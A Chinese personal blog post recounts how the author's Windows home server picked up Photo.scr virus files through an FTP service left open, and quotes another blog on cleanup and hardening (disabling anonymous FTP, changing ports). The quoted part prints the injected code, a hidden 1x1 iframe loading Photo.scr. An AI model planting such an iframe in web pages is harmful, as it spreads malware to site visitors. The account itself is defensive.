最近盘内出现了大量Photo.scr、AV.scr等文件，本以为是Emby更新后导致的，没想到居然是病毒入侵，而且已经发现了一些影视剧名字被篡改，加了前缀的那种。由此可见，家庭房服务器还是要特别注意安全问题的。

网上说这种病毒是通过FTP服务漏洞出现的，需要关闭匿名访问才行。好在今存在于Windows系统作服务器的时候才能用，所以Windows一般不要用来当服务器。

我这边为了测试WiFi6的局域网速度，Samba速度很慢，所以用FTP进行测试，经过测验发现FTP可以满速，但是测完忘了关闭，结果被病毒入侵。在早先我发威联通教程时也说过，经常看到日志中有人不断尝试破解你的密码，网络环境比你想的要糟糕很多。虽然我个人没这种低俗兴趣，但好像有不少人都喜欢玩这套东西，只能说注意一下。

我这边解决方法是采用火绒查杀，但肯定不彻底，因为我已经发现有篡改我图片和命名的举动了，在小地方写个文件，或者弄个后台也是容易的事情。

一般遇到这种情况，NAS里按理说所有文件就应该利用快照功能恢复到几个月以前的版本了，不过看这种病毒很通用，暂时没发现什么破坏，先不回滚了。但是Windows系统必须重新安装了。

这个时候如果有还原点，或者是有原来的Windows系统的ghost就好了，不过我这边有群晖的ABB套件，做过备份，因此只要直接还原就行了。

最后贴一段网上博客的原文：

Photo.scr病毒是怎么被上传的？Photo.scr病毒怎么清除和防范？

有段时间笔者的win2003服务器上出现大量Photo.scr病毒，庆幸的是检查任务管理器后并没有发现可疑进程，说明病毒没有被执行。

删除后没清静多少时间，这些病毒又冒出来了。

这些Photo.scr的路径都在IIS自带FTP的路径下，关闭FTP服务就不再出现了，只要一开FTP过段时间又会出现。

然后就认为黑客是利用了IIS自带的FTP漏洞上传的病毒文件，只要不用FTP时就关掉FTP服务。

刚刚发现原来是开了FTP的匿名连接导致的，只要取消“允许匿名连接”的勾就解决了。

这段时间笔者在给网站搬家时，发现Defender对网站文件进行报毒，查看后是被加入了以下恶意代码，以达到病毒传播的目的。
<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>

黑客并没有批量添加代码，只改了2个文件，而且不仅限是html文件，还有xml文件也没幸免，应该是黑客觉得批量添加容易被发现，所以手动添加。

清除Photo.scr病毒：
1、如果没有运行它，直接搜索Photo.scr并删除就可以了，如果已经运行过，建议杀毒或重装系统。
2、检查下文件有没有被添加恶意代码，虽然已经删除Photo.scr不会再传播，但是安全软件还是会报毒提示，如果被添加恶意代码删除即可。

安全防范建议：
1、虽然知道了是开了FTP的匿名连接导致病毒上传，不过还是建议不用FTP的时候还是关闭它，谁知道它还会有其它的什么漏洞呢。
2、建议FTP的目录不要直接设在网站目录，如需上传文件到网站目录，可以先上传到别处再通过复制或剪切到网站目录。
3、更改FTP默认端口，避免被黑客的端口扫描器扫到。